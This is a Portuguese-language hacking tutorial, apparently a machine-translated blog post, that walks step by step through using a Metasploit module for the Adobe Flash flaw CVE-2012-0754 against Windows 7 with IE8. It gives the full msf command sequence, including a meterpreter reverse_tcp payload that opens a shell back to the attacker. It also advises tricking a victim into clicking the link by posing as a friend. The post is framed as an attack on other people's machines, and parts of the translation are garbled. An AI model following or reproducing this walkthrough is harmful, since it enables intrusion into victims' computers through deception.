Como explorar Adobe Flash com um arquivo de filme corrompido para hackear o Windows 7

No meu esforço contínuo para demonstrar-lhe como cortar o omnipresente Windows 7, iremos depois desse Adobe Flash notoriamente vulnerável que esteja em quase todos os sistemas cliente do cliente (você provavelmente não o encontrará em servidores).




Flash e os outros produtos da Adobe tiveram uma reputação de design de má qualidade e insegura há bastante tempo agora. O problema é tão ruim que a Apple não permitirá o Flash no seu sistema operacional iOS, irritando muitos usuários, mas mantendo o iOS mais seguro e eficiente em termos de energia (quando o Flash falha, suga energia da bateria – e ele cai frequentemente, como nós todos sabem muito bem).

Passo 1 Pesquisar Vulnerabilidades Adobe e depois o Flash Player

Quando vamos para www.securityfocus.com e pesquisamos o banco de dados para Adobe e depois o Flash Player, obtemos 8 páginas de vulnerabilidades com 20 vulnerabilidades por página. É óbvio a partir desta lista que o Flash está protegido por problemas de segurança. Poderíamos passar semanas passando por todas as vulnerabilidades do Adobe Flash Player, mas deixarei isso para você fazer.




Se você está olhando para atacar uma máquina cliente em uma rede, você seria bem servido para gastar seu tempo focado no Adobe Flash. Há tantas vulnerabilidades e novas chegam diariamente!

Passo 2Escolha um

Vamos dar uma olhada em uma vulnerabilidade conhecida como CVE-2012-0754 , uma corrupção de memória remota. Foi encontrado na parte selvagem em fevereiro de 2012 e envolve o uso de um arquivo .mp4 corrompido para criar um estouro de buffer no Flash que permite que o invasor execute seu próprio código. Observe que ele funciona para o Adobe Flash Player através do 11.1.

Quando clicamos na aba “exploração” no topo da página, leva-nos a um link para a exploração. Podemos então baixar ou copiar e colar esse recurso para uso.




Passo 3 Use Metasploit

Vamos abrir o Metasploit e encontrar as explorações desenvolvidas para aproveitar as vulnerabilidades do Adobe Flash Player. Procure por “flash” usando o seguinte comando.

  • msf> search flash

Quando eu faço isso, acho inúmeras explorações de flash, mas destaquei o que estamos usando aqui e corresponde ao CVE-2012-0754. Agora vamos usá-lo.

  • msf > use exploit/windows/browser/adobe_flash_mp4_cprt

Quando fizermos isso, ele irá carregar a exploração no console. Agora vamos obter mais informações sobre isso.




  • msf> info

Metasploit retorna para nós algumas informações básicas sobre a exploração. Destaquei a descrição na captura de tela acima. Nesta informação, também podemos ver que esta exploração tem “alvos”. Para obter os resultados mais confiáveis, você deseja definir o alvo.

No nosso caso aqui, estamos indo atrás do Windows 7 com o IE8 (lembre-se, o IE8 veio como padrão no Windows 7 e ainda é o navegador mais utilizado com 21,2% do mercado ), então estabelecemos o alvo para 6.

  • msf > set target 6




Etapa 4 Definir opções

Em seguida, precisamos definir nossas opções. Podemos ver as opções digitando:

  • msf > show options

Precisamos configurar o SVRHOST e a carga útil no mínimo. Poderíamos também configurar o SVRPORT, o URIPATH e as configurações de SSL, mas deixaremos estes em seus padrões aqui.

  • msf > set SVRHOST 192.168.1.104
  • msf > set payload windows/meterpreter/reverse_tcp

Uma vez que definimos a carga útil, mais uma vez precisamos verificar as opções, pois as cargas úteis possuem seu próprio conjunto de opções. Quando fazemos isso, vemos que precisamos configurar o LHOST (o IP do nosso host local) para o importador de medidores.

  • msf > set LHOST 192.168.1.104

Passo 5 Exploit!

Com todos os parâmetros que precisamos, tudo o que precisamos fazer digite:

  • msf> exploit

Isso agora gerará um arquivo .mp4 corrompido e o hospedará no servidor web Metasploit. Agora, precisamos ser criativos e enviar esse link para a vítima e esperamos que eles clicem nele. Por exemplo, você poderia enviá-lo para um “amigo” dizendo “Ei, confira esse novo novo hack que eu encontrei no techconecte!”

Quando eles clicam nele, o Metasploit enviará o arquivo .mp4 para o navegador, criando um estouro de buffer, conforme visto abaixo.

Com um pouco de sorte (esta exploração não funciona 100% do tempo, mais como 50%), você será recompensado com o prompt do meterpreter e você será seu próprio sistema!

Hacking em sistemas operacionais modernos está se tornando cada vez mais difícil à medida que a Microsoft e outros fornecedores de software se tornam mais focados em segurança. O hacker vigilante pode SEMPRE encontrar uma maneira, se eles são persistentes e criativos.

Fontes como o SecurityFocus e outros bancos de dados de vulnerabilidades (mesmo os próprios da Microsoft ) estão constantemente registrando vulnerabilidades e o hacker efetivo simplesmente precisa ficar um passo à frente dos fornecedores de software.

 

Você pode gostar...

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *